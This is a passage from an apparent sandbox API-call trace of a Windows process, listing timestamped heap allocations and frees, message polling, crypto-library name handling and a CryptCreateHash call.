hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.651] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0264.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0264.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0264.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0264.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0264.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0264.652] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.652] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0264.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.652] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0264.653] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0264.653] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0264.653] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.653] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.653] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.653] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.653] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.653] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.653] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0264.654] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0264.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0264.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0264.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0264.654] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0264.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0264.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0264.654] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0264.654] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0264.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0264.655] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0264.655] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0264.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0264.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0264.656] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0264.657] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.657] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0264.657] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0264.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0264.657] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0264.657] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0264.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0264.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0264.658] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.658] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0264.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0264.658] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0264.658] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.658] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0264.658] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0264.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0264.658] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.658] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.659] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.659] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0264.659] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0264.659] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0264.659] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0264.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51cb8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0264.660] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14260 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0264.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d78 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0264.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0264.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0264.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e98 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0264.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0264.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0264.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bc8 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0264.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0264.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0264.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0264.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0264.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0264.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0264.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0264.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ce8 [0264.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0264.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0264.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0264.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0264.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0264.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0264.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0264.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14b00 [0264.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0264.664] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0264.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0264.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0264.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0264.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0264.664] RtlAllocateHeap (HeapHandle=0x970000, 